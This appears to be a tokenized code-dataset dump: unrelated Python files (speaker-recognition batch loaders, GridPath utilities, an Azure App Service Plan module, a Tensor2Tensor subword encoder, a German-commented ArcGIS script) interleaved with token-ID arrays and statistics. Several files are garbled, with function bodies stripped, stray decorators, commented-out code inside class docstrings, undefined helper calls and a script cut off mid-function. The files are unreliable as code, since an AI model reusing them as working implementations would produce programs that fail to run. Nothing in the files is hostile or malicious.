8968,
353,
13,
44506,
1330,
1388,
198,
6738,
19751,
8968,
353,
1330,
3384,
4487,
198,
198,
16737,
796,
1012,
72,
49493... | 2.875486 | 257 |
# Code for generating mini-batches. The outout can be any
# combination of:
# features/0-stats/1-stats/i-vectors/labels/scp-indices
#
# scp-indices means which position in the data had. This
# can for example be used for looking up a trial weight
# from a list or for accessing data that is already
# loaded to the GPU.
#
# There are three different generators:
#
# gen_mbatch_spk_all_utts:
# Generates minibatches that each contains all the utterances
# from a small set of speakers. The batch size is controlled
# by setting The order of the speakers is "max_spk_per_batch"
# and "max_utt_per_batch". The order of speakers is
# determined by a function, "randomize_spk_id_order", which
# will be called before the training starts as well as after
# all speakers in the training set have been used. This function
# can be provided by the user. For example, it can be a function
# that simply randomizes the speakers. But we could also consider
# to make a function that puts e.g. 10 "similar" speakers in
# consequtively and max_spk_per_batch=10 to get them in the same
# batch.
# gen_mbatch_utt_groups
# This generator gives batches according to a list of "utterance groups"
# A function that generate the utterance groups needs to be provided.
# This function will be called before the training starts as well as
# after all data have been used so that it can be re-shuffled (or re-ordered
# according to some other rule)
# Assumming it gives [g1, g2,...] where gi is a group of utterances, e.g.,
# g1 = [u11, u12, u13,...]
# The generator has three options to form mini-batches.
# 1, "diag": Minibatches are (g1 - g1), (g2 - g2), (g3 - g3),...
# 2, "rowwise": Minibatches are (g1 - g1), (g1 - g2), (g1 - g3),...,(g2 - g2), (g2 - g3)..., (g3 - g3)
# All possible batches are looped throuhg in order. Advantage: One use the data more per
# copying to the GPU (BUT THIS REMAINS TO BE IMPLEMENTED.)
# Disadvantage: Consequetive batches, e.g. (g1 - g1) and (g1 - g2) are more statistically dependent.
# 3, "random": Minibatches are (gi - gj),... Indices "i" and "j" are generated randomly until all
# possible batces have been used
#
# gen_mbatch_trials --NOT IMPLEMENTED YET--
# Will take a list of (difficult) trials and divide into batches.
from utils.misc import get_logger
log = get_logger()
import h5py, os, time
from pympler.asizeof import asizeof
import sys
import numpy as np
import threading
########################################################################################
### General functions for processing the scp, loading data, etc.
####
# Gathers speaker info from an scp.
###
# Function for loading 0th and/or 1st order stats
########################################################################################
# Functions for arranging speakar IDs. The batch generator
# will call one of these functions whenever the whole data
# set has been looped through.
# This generator gives batches with all utterances from
# some speakers.
# ivec_dir, stats_dir, feat_dir should be either a path or None.
# If None, this data will not be loaded.
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
########################################################################################
# gen_mbatch_utt_groups
# ivec_dir, stats_dir, feat_dir
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
# This class generates batches from an an iterator like the one above.
# It creates an additional thread which is used to load data will
# the training is ongoing. The maximum number of batches it can keep
# in que is given by "batch_que_length".
class batch_iterator(object):
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
# As above but takes a list of iterators and and scp info corresponding to different sets.
# Each set will be used once per batch
class batch_iterator_multi_set(object):
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
####
# This class generates batches from an an iterator like the one above.
# It creates an additional thread which is used to load data will
# the training is ongoing. The maximum number of batches it can keep
# in que is given by "batch_que_length".
class batch_iterator_2(object):
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
| [
198,
198,
2,
6127,
329,
15453,
9927,
12,
8664,
2052,
13,
383,
503,
448,
460,
307,
597,
198,
2,
6087,
286,
25,
220,
198,
2,
3033,
14,
15,
12,
34242,
14,
16,
12,
34242,
14,
72,
12,
303,
5217,
14,
23912,
1424,
14,
1416,
79,
12,
... | 2.630297 | 2,832 |
# Copyright 2016-2020 Blue Marble Analytics LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Various auxiliary functions used in other modules
"""
from importlib import import_module
import os.path
import pandas as pd
import traceback
def get_required_subtype_modules_from_projects_file(
scenario_directory, subproblem, stage, which_type, prj_or_tx="project"
):
"""
Get a list of unique types from projects.tab.
"""
project_df = pd.read_csv(
os.path.join(
scenario_directory,
str(subproblem),
str(stage),
"inputs",
"{}s.tab".format(prj_or_tx),
),
sep="\t",
)
required_modules = project_df[which_type].unique()
return required_modules
def load_subtype_modules(required_subtype_modules, package, required_attributes):
"""
Load subtype modules (e.g. capacity types, operational types, etc).
This function will also check that the subtype modules have certain
required attributes.
:param required_subtype_modules: name of the subtype_modules to be loaded
:param package: The name of the package the subtype modules reside in. E.g.
capacity_type modules live in gridpath.project.capacity.capacity_types
:param required_attributes: module attributes that are required for each of
the specified required_subtype_modules. E.g. each capacity_type will
need to have a "capacity_rule" attribute.
:return: dictionary with the imported subtype modules
{name of subtype module: Python module object}
"""
imported_subtype_modules = dict()
for m in required_subtype_modules:
try:
imp_m = import_module("." + m, package=package)
imported_subtype_modules[m] = imp_m
for a in required_attributes:
if hasattr(imp_m, a):
pass
else:
raise Exception(
"ERROR! No "
+ str(a)
+ " function in subtype module "
+ str(imp_m)
+ "."
)
except ImportError:
print("ERROR! Unable to import subtype module " + m + ".")
traceback.print_exc()
return imported_subtype_modules
def join_sets(mod, set_name_list):
"""
Join sets in a list.
If list contains only a single set, return just that set.
:param mod:
:param set_name_list:
:return:
"""
if len(set_name_list) == 0:
return []
elif len(set_name_list) == 1:
return getattr(mod, set_name_list[0])
else:
joined_set = []
for s in set_name_list:
for element in getattr(mod, s):
joined_set.append(element)
return joined_set
def subset_init_by_param_value(mod, set_name, param_name, param_value):
"""
Initialize subset based on a param value.
:param set_name:
:param param_name:
:param param_value:
:return:
"""
return [
i for i in getattr(mod, set_name) if getattr(mod, param_name)[i] == param_value
]
def find_list_item_position(l, item):
"""
:param l:
:param item:
:return:
"""
return [i for i, element in enumerate(l) if element == item]
def check_list_items_are_unique(l):
"""
Check if items in a list are unique
:param l:
A list
:return:
Nothing
"""
for item in l:
positions = find_list_item_position(l, item)
check_list_has_single_item(
l=positions,
error_msg="Service "
+ str(item)
+ " is specified more than once"
+ " in generators.tab.",
)
def cursor_to_df(cursor):
"""
Convert the cursor object with query results into a pandas DataFrame.
:param cursor: cursor object with query result
:return:
"""
df = pd.DataFrame(
data=cursor.fetchall(), columns=[s[0] for s in cursor.description]
)
return df
def check_for_integer_subdirectories(main_directory):
"""
:param main_directory: directory where we'll look for subdirectories
:return: True or False depending on whether subdirectories are found
Check for subdirectories and return list. Only take subdirectories
that can be cast to integer (this will exclude other directories
such as "pass_through_inputs", "inputs", "results", "logs", and so on).
We do rely on order downstream, so make sure these are sorted.
"""
subdirectories = sorted(
[d for d in next(os.walk(main_directory))[1] if is_integer(d)], key=int
)
# There are subdirectories if the list isn't empty
return subdirectories
def is_integer(n):
"""
Check if a value can be cast to integer.
"""
try:
int(n)
return True
except ValueError:
return False
| [
2,
15069,
1584,
12,
42334,
4518,
36891,
30437,
11419,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,... | 2.483753 | 2,185 |
# -*- coding: utf-8 -*-
"""
Azure Resource Manager (ARM) Web App Service Plan Operations Execution Module
.. versionadded:: 3.0.0
:maintainer: <devops@eitr.tech>
:configuration: This module requires Azure Resource Manager credentials to be passed as keyword arguments
to every function or via acct in order to work properly.
Required provider parameters:
if using username and password:
* ``subscription_id``
* ``username``
* ``password``
if using a service principal:
* ``subscription_id``
* ``tenant``
* ``client_id``
* ``secret``
Optional provider parameters:
**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud.
Possible values:
* ``AZURE_PUBLIC_CLOUD`` (default)
* ``AZURE_CHINA_CLOUD``
* ``AZURE_US_GOV_CLOUD``
* ``AZURE_GERMAN_CLOUD``
"""
# Python libs
from __future__ import absolute_import
import logging
import datetime
# Azure libs
HAS_LIBS = False
try:
import azure.mgmt.web.models # pylint: disable=unused-import
from msrestazure.azure_exceptions import CloudError
from msrest.exceptions import ValidationError
from azure.mgmt.web.v2019_08_01.models._models_py3 import (
DefaultErrorResponseException,
)
HAS_LIBS = True
except ImportError:
pass
__func_alias__ = {"list_": "list"}
log = logging.getLogger(__name__)
async def create_or_update(
hub, ctx, name, resource_group, kind, sku="F1", reserved=None, tags=None, **kwargs,
):
"""
.. versionadded:: 3.0.0
Creates or updates an App Service Plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
:param kind: The kind of the App Service Plan. Possible values include: "linux", "windows", "functionapp"
:param sku: The SKU (pricing tier) of the App Service Plan. Defaults to "F1".
:param reserved: This value should be True if you are using a Linux App Service Plan, False otherwise.
Defaults to False.
:param tags: Tags associated with the App Service Plan.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.create_or_update test_name test_group test_kind test_sku
"""
if "location" not in kwargs:
rg_props = await hub.exec.azurerm.resource.group.get(
ctx, resource_group, **kwargs
)
if "error" in rg_props:
log.error("Unable to determine location from resource group specified.")
return {
"error": "Unable to determine location from resource group specified."
}
kwargs["location"] = rg_props["location"]
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
if not isinstance(sku, dict):
sku = {"name": sku}
try:
planmodel = await hub.exec.azurerm.utils.create_object_model(
"web",
"AppServicePlan",
sku=sku,
kind=kind,
reserved=reserved,
tags=tags,
**kwargs,
)
except TypeError as exc:
result = {
"error": "The object model could not be built. ({0})".format(str(exc))
}
return result
try:
plan = webconn.app_service_plans.create_or_update(
name=name, resource_group_name=resource_group, app_service_plan=planmodel,
)
plan.wait()
result = plan.result().as_dict()
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
except (ValidationError, DefaultErrorResponseException) as exc:
result = {"error": str(exc)}
return result
async def delete(hub, ctx, name, resource_group, **kwargs):
"""
.. versionadded:: 3.0.0
Delete an App Service Plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.delete test_name test_group
"""
result = False
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
plan = webconn.app_service_plans.delete(
name=name, resource_group_name=resource_group,
)
result = True
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
return result
async def get(hub, ctx, name, resource_group, **kwargs):
"""
.. versionadded:: 3.0.0
Get an App Service plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.get test_name test_group
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
plan = webconn.app_service_plans.get(
name=name, resource_group_name=resource_group,
)
result = plan.as_dict()
except AttributeError as exc:
result = {
"error": "The specified App Service Plan does not exist within the given resource group."
}
return result
async def get_server_farm_skus(hub, ctx, name, resource_group, **kwargs):
"""
.. versionadded:: 3.0.0
Gets all selectable SKUs for a given App Service Plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.get_server_farm_skus test_name test_group
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
skus = webconn.app_service_plans.get_server_farm_skus(
name=name, resource_group_name=resource_group,
)
result = skus
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
return result
async def list_(hub, ctx, resource_group=None, detailed=None, **kwargs):
"""
.. versionadded:: 3.0.0
Get all App Service plans for a subscription.
:param resource_group: The name of the resource group to limit the results.
:param detailed: Specify True to return all App Service Plan properties. The default is False, which returns a
subset of the properties. Retrieval of all properties may increase the API latency. If a resource group is
specified, then all App Service Plan properties are returned regardless of what this parameter is set to.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.list
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
if resource_group:
plans = await hub.exec.azurerm.utils.paged_object_to_list(
webconn.app_service_plans.list_by_resource_group(
resource_group_name=resource_group
)
)
else:
plans = await hub.exec.azurerm.utils.paged_object_to_list(
webconn.app_service_plans.list(detailed=detailed)
)
for plan in plans:
result[plan["name"]] = plan
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
except (DefaultErrorResponseException) as exc:
result = {"error": str(exc)}
return result
async def list_web_apps(hub, ctx, name, resource_group, skip_token=None, **kwargs):
"""
.. versionadded:: 3.0.0
Get all apps associated with an App Service plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
:param skip_token: Skip to a web app in the list of webapps associated with app service plan. If specified, the
resulting list will contain web apps starting from (including) the skipToken. Otherwise, the resulting list
contains web apps from the start of the list.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.list_web_apps test_name test_group
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
apps = await hub.exec.azurerm.utils.paged_object_to_list(
webconn.app_service_plans.list_web_apps(
name=name, resource_group_name=resource_group, skip_token=skip_token
)
)
for app in apps:
result[app["name"]] = app
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
except (DefaultErrorResponseException) as exc:
result = {"error": str(exc)}
return result
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
26903,
495,
20857,
9142,
357,
33456,
8,
5313,
2034,
4809,
5224,
16205,
37497,
19937,
198,
198,
492,
2196,
29373,
3712,
513,
13,
15,
13,
15,
198,
198,
25,
7... | 2.509549 | 3,613 |
"""
For passing messages one can use Pipe() (for a connection between two processes)
or a queue (which allows multiple producers and consumers).
Returns a pair (conn1, conn2) of Connection objects representing the ends of a
pipe.
If duplex is True (the default) then the pipe is bidirectional. If duplex is
False then the pipe is unidirectional: conn1 can only be used for receiving
messages and conn2 can only be used for sending messages.
"""
import multiprocessing as mp
connection_1, connection_2 = mp.Pipe()
obj_to_send: object = 'hello'
connection_1.send(obj=obj_to_send)
obj_received = connection_2.recv()
print(obj_received)
| [
37811,
198,
1890,
6427,
6218,
530,
460,
779,
36039,
3419,
357,
1640,
257,
4637,
1022,
734,
7767,
8,
220,
198,
273,
257,
16834,
357,
4758,
3578,
3294,
11408,
290,
7008,
737,
198,
198,
35561,
257,
5166,
357,
37043,
16,
11,
48260,
17,
... | 3.394737 | 190 |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Encoders for text data.
* TextEncoder: base class
* SubwordTextEncoder: invertible
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from itertools import chain
import re
import time
import six
from six.moves import range # pylint: disable=redefined-builtin
# Reserved tokens for things like padding and EOS symbols.
PAD = "[PAD]"
EOS = "[EOS]"
UNK = "[UNK]"
CLS = "[CLS]"
SEP = "[SEP]"
MASK = "[MASK]"
RESERVED_TOKENS = [PAD, EOS, UNK, CLS, SEP, MASK]
NUM_RESERVED_TOKENS = len(RESERVED_TOKENS)
PAD_ID = RESERVED_TOKENS.index(PAD) # Normally 0
EOS_ID = RESERVED_TOKENS.index(EOS) # Normally 1
if six.PY2:
RESERVED_TOKENS_BYTES = RESERVED_TOKENS
else:
RESERVED_TOKENS_BYTES = [bytes(PAD, "ascii"), bytes(EOS, "ascii")]
# Regular expression for unescaping token strings.
# '\u' is converted to '_'
# '\\' is converted to '\'
# '\213;' is converted to unichr(213)
_UNESCAPE_REGEX = re.compile(r"\\u|\\\\|\\([0-9]+);")
_ESCAPE_CHARS = set(u"\\_u;0123456789")
_SPECIAL_CHARS = set(u"!\"\'#$%&*()`+,-./:;<=>?@[]^_{}~|")
# Unicode utility functions that work with Python 2 and 3
class TextEncoder(object):
"""Base class for converting from ints to/from human readable strings."""
@property
@property
def _escape_token(token, alphabet):
"""Escape away underscores and OOV characters and append '_'.
This allows the token to be expressed as the concatenation of a list
of subtokens from the vocabulary. The underscore acts as a sentinel
which allows us to invertibly concatenate multiple such lists.
Args:
token: A unicode string to be escaped.
alphabet: A set of all characters in the vocabulary's alphabet.
Returns:
escaped_token: An escaped unicode string.
Raises:
ValueError: If the provided token is not unicode.
"""
if not isinstance(token, six.text_type):
raise ValueError("Expected string type for token, got %s" % type(token))
token = token.replace(u"\\", u"\\\\").replace(u"_", u"\\u")
ret = [c if c in alphabet and c != u"\n" else r"\%d;" % ord(c) for c in token]
return u"".join(ret) + "_"
class SubwordTextEncoder(TextEncoder):
"""Class for invertibly encoding text using a limited vocabulary.
Invertibly encodes a native string as a sequence of subtokens from a limited
vocabulary.
A SubwordTextEncoder is built from a corpus (so it is tailored to the text in
the corpus), and stored to a file. See text_encoder_build_subword.py.
It can then be loaded and used to encode/decode any text.
Encoding has four phases:
1. Tokenize into a list of tokens. Each token is a unicode string of either
all alphanumeric characters or all non-alphanumeric characters. We drop
tokens consisting of a single space that are between two alphanumeric
tokens.
2. Escape each token. This escapes away special and out-of-vocabulary
characters, and makes sure that each token ends with an underscore, and
has no other underscores.
3. Represent each escaped token as a the concatenation of a list of subtokens
from the limited vocabulary. Subtoken selection is done greedily from
beginning to end. That is, we construct the list in order, always picking
the longest subtoken in our vocabulary that matches a prefix of the
remaining portion of the encoded token.
4. Concatenate these lists. This concatenation is invertible due to the
fact that the trailing underscores indicate when one list is finished.
"""
def __init__(self, filename=None):
"""Initialize and read from a file, if provided.
Args:
filename: filename from which to read vocab. If None, do not load a
vocab
"""
self._alphabet = set()
super(SubwordTextEncoder, self).__init__()
@property
def vocab_size(self):
"""The subtoken vocabulary size."""
return len(self._all_subtoken_strings)
def _escaped_token_to_subtoken_strings(self, escaped_token):
"""Converts an escaped token string to a list of subtoken strings.
Args:
escaped_token: An escaped token as a unicode string.
Returns:
A list of subtokens as unicode strings.
"""
# NOTE: This algorithm is greedy; it won't necessarily produce the "best"
# list of subtokens.
ret = []
start = 0
token_len = len(escaped_token)
while start < token_len:
for end in range(
min(token_len, start + self._max_subtoken_len), start, -1):
subtoken = escaped_token[start:end]
if subtoken in self._subtoken_string_to_id:
ret.append(subtoken)
start = end
break
else: # Did not break
# If there is no possible encoding of the escaped token then one of the
# characters in the token is not in the alphabet. This should be
# impossible and would be indicative of a bug.
assert False, "Token substring not found in subtoken vocabulary."
return ret
def build_from_token_counts(self,
token_counts,
min_count,
num_iterations=4,
reserved_tokens=None,
max_subtoken_length=None):
"""Train a SubwordTextEncoder based on a dictionary of word counts.
Args:
token_counts: a dictionary of Unicode strings to int.
min_count: an integer - discard subtokens with lower counts.
num_iterations: an integer. how many iterations of refinement.
reserved_tokens: List of reserved tokens. The global variable
`RESERVED_TOKENS` must be a prefix of `reserved_tokens`. If this
argument is `None`, it will use `RESERVED_TOKENS`.
max_subtoken_length: Maximum length of a subtoken. If this is not set,
then the runtime and memory use of creating the vocab is quadratic in
the length of the longest token. If this is set, then it is instead
O(max_subtoken_length * length of longest token).
Raises:
ValueError: if reserved is not 0 or len(RESERVED_TOKENS). In this case, it
is not clear what the space is being reserved for, or when it will be
filled in.
"""
if reserved_tokens is None:
reserved_tokens = RESERVED_TOKENS
else:
# There is not complete freedom in replacing RESERVED_TOKENS.
for default, proposed in zip(RESERVED_TOKENS, reserved_tokens):
if default != proposed:
raise ValueError("RESERVED_TOKENS must be a prefix of "
"reserved_tokens.")
start_time = time.time()
# Initialize the alphabet. Note, this must include reserved tokens or it can
# result in encoding failures.
alphabet_tokens = chain(six.iterkeys(token_counts),
[native_to_unicode(t) for t in reserved_tokens])
# all alphabets in tokens
self._init_alphabet_from_tokens(alphabet_tokens)
# Bootstrap the initial list of subtokens with the characters from the
# alphabet plus the escaping characters.
self._init_subtokens_from_list(list(self._alphabet),
reserved_tokens=reserved_tokens)
# We build iteratively. On each iteration, we segment all the words,
# then count the resulting potential subtokens, keeping the ones
# with high enough counts for our new vocabulary.
if min_count < 1:
min_count = 1
for i in range(num_iterations):
# Collect all substrings of the encoded token that break along current
# subtoken boundaries.
subtoken_counts = collections.defaultdict(int)
for token, count in six.iteritems(token_counts):
iter_start_time = time.time()
escaped_token = _my_escape_token(token, self._alphabet)
subtokens = self._escaped_token_to_subtoken_strings(escaped_token)
# excaped_token '_1234' -> subtoknes ['_12', '34'] (ex)
# '_1234':100 -> '_', '_1', '_12', '_123', '_1234','3', '34' :+= 100,
start = 0
for subtoken in subtokens:
last_position = len(escaped_token) + 1
if max_subtoken_length is not None:
last_position = min(last_position, start + max_subtoken_length)
for end in range(start + 1, last_position):
new_subtoken = escaped_token[start:end]
subtoken_counts[new_subtoken] += count
start += len(subtoken)
iter_time_secs = time.time() - iter_start_time
# Array of sets of candidate subtoken strings, by length.
len_to_subtoken_strings = []
for subtoken_string, count in six.iteritems(subtoken_counts):
lsub = len(subtoken_string)
if count >= min_count:
while len(len_to_subtoken_strings) <= lsub:
len_to_subtoken_strings.append(set())
len_to_subtoken_strings[lsub].add(subtoken_string)
# Consider the candidates longest to shortest, so that if we accept
# a longer subtoken string, we can decrement the counts of its prefixes.
new_subtoken_strings_with_count = []
for lsub in range(len(len_to_subtoken_strings) - 1, 0, -1):
subtoken_strings = len_to_subtoken_strings[lsub]
for subtoken_string in subtoken_strings:
count = subtoken_counts[subtoken_string]
if count >= min_count:
# Exclude alphabet tokens here, as they must be included later,
# explicitly, regardless of count.
if subtoken_string not in self._alphabet:
new_subtoken_strings_with_count.append((count, subtoken_string))
for l in range(1, lsub):
subtoken_counts[subtoken_string[:l]] -= count
# Include the alphabet explicitly to guarantee all strings are encodable.
new_subtoken_strings_with_count.extend((subtoken_counts.get(a, 0), a)
for a in self._alphabet)
new_subtoken_strings_with_count.sort(reverse=True)
# Reinitialize to the candidate vocabulary.
new_subtoken_strings = [subtoken for _, subtoken in new_subtoken_strings_with_count]
if reserved_tokens:
# escaped_reserved_tokens = [
# _escape_token(native_to_unicode(t), self._alphabet)
# for t in reserved_tokens
# ]
# new_subtoken_strings = escaped_reserved_tokens + new_subtoken_strings
new_subtoken_strings = reserved_tokens + new_subtoken_strings
self._init_subtokens_from_list(new_subtoken_strings)
# tf.logging.info("vocab_size = %d" % self.vocab_size)
# print(self.vocab_size)
self.subtokens_with_counts = new_subtoken_strings_with_count
# Frequency of "_" is high.
# So remove from current position and add to the last.
new_subtoken_strings.remove("_")
new_subtoken_strings.insert(len(new_subtoken_strings), "_")
oov_list = []
for idx, subtoken in enumerate(new_subtoken_strings):
if subtoken.startswith("_") and subtoken != "_":
new_subtoken_strings[idx] = subtoken[1:]
elif subtoken[0] in self._alphabet and subtoken not in reserved_tokens:
new_subtoken_strings[idx] = "##" + subtoken
else:
oov_list.append(subtoken)
new_subtoken_strings.extend(char for char in self._alphabet
if char not in new_subtoken_strings)
# print(new_subtoken_strings)
print("total vocab size : {}, {} seconds elapsed ".format(self.vocab_size, time.time() - start_time))
# print(oov_list)
self._init_subtokens_from_list(new_subtoken_strings)
def _init_subtokens_from_list(self, subtoken_strings, reserved_tokens=None):
"""Initialize token information from a list of subtoken strings.
Args:
subtoken_strings: a list of subtokens
reserved_tokens: List of reserved tokens. We must have `reserved_tokens`
as None or the empty list, or else the global variable `RESERVED_TOKENS`
must be a prefix of `reserved_tokens`.
Raises:
ValueError: if reserved is not 0 or len(RESERVED_TOKENS). In this case, it
is not clear what the space is being reserved for, or when it will be
filled in.
"""
if reserved_tokens is None:
reserved_tokens = []
if reserved_tokens:
self._all_subtoken_strings = reserved_tokens + subtoken_strings
else:
self._all_subtoken_strings = subtoken_strings
# we remember the maximum length of any subtoken to avoid having to
# check arbitrarily long strings.
self._max_subtoken_len = max([len(s) for s in subtoken_strings])
self._subtoken_string_to_id = {
s: i + len(reserved_tokens)
for i, s in enumerate(subtoken_strings) if s
}
# Initialize the cache to empty.
self._cache_size = 2 ** 20
self._cache = [(None, None)] * self._cache_size
def _init_alphabet_from_tokens(self, tokens):
    """Initialize alphabet from an iterable of token or subtoken strings."""
    # Every character appearing in any token goes into the alphabet,
    # which guarantees that an arbitrary token can always be encoded.
    chars = {ch for tok in tokens for ch in tok}
    # Escaping and special characters must always be encodable as well.
    chars |= _ESCAPE_CHARS
    chars |= _SPECIAL_CHARS
    self._alphabet = chars
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
15069,
2864,
383,
309,
22854,
17,
51,
22854,
46665,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2... | 2.632599 | 5,264 |
from __future__ import print_function
from __future__ import division
import os
import mmap
import struct
import re
import pasm
#Pass in the range of addresses we want to cover, and size the mmap accordingly
#TODO: Also check to see if the PRU is asleep
#NOTE: This function returns a dictionary oject with state information in a format that mirrors the front-end model state | [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
198,
11748,
28686,
198,
11748,
8085,
499,
198,
11748,
2878,
198,
11748,
302,
198,
198,
11748,
279,
8597,
628,
220,
220,
220,
1303,
14478,
287,... | 3.805825 | 103 |
# ArcGIS Skript
#
# Zweck:
# Anpassen von Haltungs- und Hausanschlussdaten mithilfe von Schachtsohlen
#
# Anmerkungen:
# Kommentare sind in Englisch verfasst, nur die ausgegebenen Nachrichten sind auf Deutsch.
# Damit wird möglichst viel Arbeit vermieden, falls das Skript mal bei Bedarf auf Englisch ausgeführt werden sollte.
# Der Ausgabeordner wird vor dem Ausführen nicht geleert, aus Übersichtsgründen sollte dieser also vorher leer sein.
#
# Für aktuelle Verwendung zu nutzende Parameter in ArcGis:
# Haltungen: haltungen_neustadt.shp Ursprungsdaten.
# Anschlüsse: anschlussleitung.shp Ursprungsdaten.
# Schächte: schacht_adjust_3d_z.shp Das manuell angepasste Feature der Schachtsohlen.
# Ausgabeordner: <user-defined> Sollte ein leerer Ordner sein. (Erzeugt viele Dateien)
#
# © Hochschule Bremen, 2021-2022
# Autor: Alexander Fritsch
import os
import math
import time
import copy
import arcpy
from arcpy import env
def logFeatureClasses(mode):
    """**Logs all feature classes in the output folder** to log.txt within the output folder.

    :param string mode: The file mode to use. Values: "w", "a"
    :raises ValueError: if mode is neither "w" nor "a".
    """
    if mode not in ("w", "a"):
        raise ValueError('Use "w" (write) or "a" (append) as mode.')
    # One entry per feature class, each listing its fields with type/alias.
    with open('log.txt', mode) as log_file:
        for feature_class in arcpy.ListFeatureClasses():
            full_path = os.path.join(arcpy.env.workspace, feature_class)
            log_file.write("Feature class: {0}\n".format(full_path))
            for field in arcpy.ListFields(feature_class):
                log_file.write(" Field: {0}\n".format(field.name))
                log_file.write(" Type: {0}\n".format(field.type))
                log_file.write(" Alias: {0}\n".format(field.aliasName))
            log_file.write("\n")
# -------------------------------------------------------------------------------------#
def updateProgress(label, position=None):
    """**Updates the arcpy progress bar**

    :param string label: What to write into the label box.
    :param int position: [optional] The percentage for the progress bar.
    :returns: void
    :raises ValueError: if label is empty/None.
    """
    if label:
        arcpy.SetProgressorLabel(label)
    else:
        raise ValueError("Please specify a label when updating progress bar.")
    # Compare against None explicitly: a position of 0 is a valid value,
